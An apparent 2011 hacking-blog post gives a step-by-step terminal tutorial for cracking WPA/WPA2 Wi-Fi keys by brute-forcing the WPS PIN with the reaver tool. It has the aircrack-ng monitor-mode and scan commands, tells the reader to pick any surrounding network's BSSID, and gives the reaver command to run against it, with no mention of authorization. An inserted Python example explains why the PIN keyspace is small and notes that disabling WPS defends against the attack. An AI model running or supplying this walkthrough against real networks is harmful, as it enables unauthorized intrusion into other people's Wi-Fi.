How to Crack WPA/WPA2 without a dictionary in 4-10 hours with Reaver

The reign of secure WPA/WPA2 network encryption is now over. It no longer takes decades to crack, thanks to Tactical Network Solutions. Their brilliant team found a weakness in Wi-Fi Protected Setup (WPS) that lets an attacker brute-force the WPS PIN and then recover the WPA/WPA2 key. We'll be using reaver, a tool that exploits this bug.
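
Why the brute force finishes in hours rather than centuries: a WPS PIN has eight digits, but the eighth digit is a checksum over the first seven, and the registrar confirms the first four digits and the last four in two separate steps, so the whole PIN space collapses from 100,000,000 to 11,000 candidates. The script below is an added example, not code from this post or from the reaver project; it computes the WPS checksum and the resulting keyspace, and the seconds-per-attempt figure is an assumed placeholder, not a measurement. The practical defence is to disable WPS on the access point, or to use firmware that locks WPS after a few failed PIN attempts.

```python
# Added example (not from the original post or from reaver): why the
# WPS PIN space is tiny. A WPS PIN has 8 decimal digits; the 8th is a
# checksum over the first 7, and the registrar confirms the first 4
# digits and the last 4 digits in two separate steps.

NAIVE_KEYSPACE = 10 ** 8   # what an 8-digit PIN would offer if checked atomically

def wps_checksum(first_seven: int) -> int:
    """Checksum digit defined by the WPS spec for a 7-digit PIN prefix.

    Digits at odd positions (1st, 3rd, 5th, 7th) are weighted 3, the
    others 1; the checksum makes the weighted sum a multiple of 10.
    """
    if not 0 <= first_seven <= 9_999_999:
        raise ValueError("expected a 7-digit PIN prefix")
    acc = 0
    n = first_seven
    for _ in range(4):
        acc += 3 * (n % 10)   # 7th, 5th, 3rd, 1st digit
        n //= 10
        acc += n % 10         # 6th, 4th, 2nd digit (0 on the last pass)
        n //= 10
    return (10 - acc % 10) % 10

def is_valid_pin(pin: str) -> bool:
    """True if an 8-digit PIN string carries the correct checksum."""
    return len(pin) == 8 and pin.isdigit() and int(pin[7]) == wps_checksum(int(pin[:7]))

def effective_keyspace() -> int:
    """Worst-case guesses when the two halves are confirmed separately."""
    first_half = 10 ** 4    # digits 1-4, confirmed on their own
    second_half = 10 ** 3   # digits 5-7; digit 8 follows from the checksum
    return first_half + second_half

def worst_case_hours(seconds_per_attempt: float) -> float:
    """Hours for an exhaustive run; seconds_per_attempt is an assumed input."""
    return effective_keyspace() * seconds_per_attempt / 3600

if __name__ == "__main__":
    print("valid 12345670:", is_valid_pin("12345670"))
    print("naive vs effective keyspace:", NAIVE_KEYSPACE, effective_keyspace())
    # 1.5 s per attempt is an assumed placeholder, not a measured rate
    print(f"worst case at 1.5 s/attempt: {worst_case_hours(1.5):.1f} h")
```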

I will take you through how this is done on a Linux machine, specifically Ubuntu, using the terminal:

1. Download aircrack-ng:

sudo apt-get install aircrack-ng

2. Put Wifi adapter into monitor mode:

sudo airmon-ng start wlan0

3. Use airodump-ng to scan for WPA/WPA2 encrypted network BSSIDs:

sudo airodump-ng mon0

4. Press <ctrl+c> after a few seconds, or once the list of BSSIDs has populated. It should look like this:

The BSSIDs are listed on the left; these are the IDs of the surrounding networks. Pick one that uses WPA/WPA2 with a Pre-Shared Key (PSK).

Don't close this terminal; open up a new terminal and use it for the following steps.

5. Download and install libsqlite3-dev:

sudo apt-get install libsqlite3-dev

6. Download reaver:

7. Extract the reaver tar.gz file:

tar xfvz reaver-1.4.tar.gz

8. Install reaver:

cd reaver-1.4/src/ && ./configure && make && sudo make install
9. Get cracking! Copy the BSSID you chose from the other terminal and enter it like this:

sudo reaver -i mon0 -b <paste BSSID here!!> -vv

-i mon0 = use the mon0 interface, which is your wifi adapter in monitor mode.
-b "some BSSID" = the router to crack.
-vv = give very verbose output.

10. Now wait around 4-10 hours as it cracks the network key!

About Me

Saint Andrew is a computer science student. Saint Andrew is a founder of the blog Saint Andrew's Hacking Paradise.


© 2011 Saint Andrew's Hacking Paradise
